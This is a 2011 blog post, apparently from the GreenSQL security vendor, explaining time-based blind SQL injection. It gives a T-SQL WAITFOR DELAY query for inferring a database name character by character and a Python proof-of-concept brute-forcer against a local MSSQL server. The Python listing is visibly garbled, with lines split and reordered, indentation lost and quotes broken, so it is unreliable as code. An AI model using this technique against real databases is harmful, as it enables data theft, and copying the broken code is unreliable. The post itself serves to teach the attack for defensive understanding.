Home > GreenSQL > Time-Based Blind SQL Injection

Time-Based Blind SQL Injection

September 1st, 2011

Time-Based Blind SQL Injection

 
Overview
=======
Blind SQL Injection is an attack which the attacker gets an indication for the query execution success. The attacker doesn’t get the query results.
Most of the time, the indication bases on server errors or customized application errors.

Time-Based Blind SQL Injection
======================
Sometimes the attacker might not be able to identify the query execution success, because the server/application doesn’t show any error.
One of the techniques to get an indication for the query execution success called Time-Based Blind SQL Injection.
With this technique, the attacker executes functions that take some time to finish (for example: Benchmark, Delay, etc.). By measuring the time took the application to response, the attacker might be able to identify if the query executed successfully or the query execution failed.

Discovering Database Details
====================
An attacker can export information from the database by using Time-Based Blind SQL Injection.
For example, an attacker can brute force the database’s name with this technique:
1.    Set the time before the query execution.
2.    Execute the following query:

declare @s varchar(100)
select @s = db_name()
if (ascii(substring(@s,1,1))) = 65
waitfor delay ’0:0:10′
else
waitfor delay ’0:0:2′

3.    Set the time after the query execution.
4.    Calculate time it took to the query to run,
4.1.    if it took 10 seconds, the first character of the database’s name is ‘A’ (ASCII 65)
4.2.    if it took 2 seconds, the first character of the database’s name if NOT ‘A’.

Database’s name brute-forcer (Proof-of-Concept in Python):
==========================================

Tested Environment

1.    Windows 7 64-bits.
2.    MSSQL Server 2008.
3.    Database: AdventureWorks, can be downloaded from: http://msftdbprodsamples.codeplex.com/releases/view/37109)
4.    SQL Server Configuration:
a.    TCP/IP – Enabled.
b.    Authentication Mode – Both SQL Server and Windows.
c.    SQL User:
i.    Name: GreenSQL
ii.    Password: GreenSQL
iii.    Server Roles: sysadmin
iv.    User Mapping: AdventureWorks

 

This code is for educational purposes only!

Python Source Code
===============

##################################################
##   GreenSQL Time-Based Blind SQL Injection    ##
##          Database Name Brute Forcer          ##
##              Proof-of-Concept                ##
##  This code is for educational purposes only  ##
##################################################

import pyodbc
import time
## Connect to the DB
cnxn = pyodbc.connect('DRIVER={SQL
Server};SERVER=localhost;DATABASE=AdventureWorks;UID=GreenSQL;PWD=GreenSQL')
cursor = cnxn.cursor()
## Set variables
DBName = ''
CurrChr = 0
FirstRun = int(time.time())
ASCIIRange = range(32,126)
## Discover DB Name (Brute Force)
for i in range(1,100):
if CurrChr == 125: ## if the last loop ended without a match,
break the loop
break
for CurrChr in ASCIIRange:
str(i)
print "Trying Char: " + chr(CurrChr) + " @ position: " +
print "DBName: " + DBName
query = 'declare @s varchar(100) '
query = query + 'select @s = db_name() '
query = query + 'if (ascii(substring(@s, '
query = query + str(i)
query = query + ', 1))) = '
query = query + str(CurrChr)
query = query + ' waitfor delay '0:0:10'' ##if the
current character matches, wait 10 seconds
query = query + 'else '
query = query + 'waitfor delay '0:0:2''
2 seconds
print query
StartTime = int(time.time()) ## Set the time before query
execution (UNIX Time)
cursor.execute(query)
EndTime = int(time.time())
execution (UNIX Time)
if EndTime-StartTime >= 10:
matches,
String
## Execute the query
## Set time after query
## if the current character
DBName = DBName + chr(CurrChr) ## add it to DBName
CurrChr = 1
break
## Print the findings and statistics
DoneTime = int(time.time())
print "DB Name: " + DBName
print "It took " + str(DoneTime - FirstRun) + "seconds!"

Share this article

GreenSQL , , , , , , ,

  1. No comments yet.
  1. No trackbacks yet.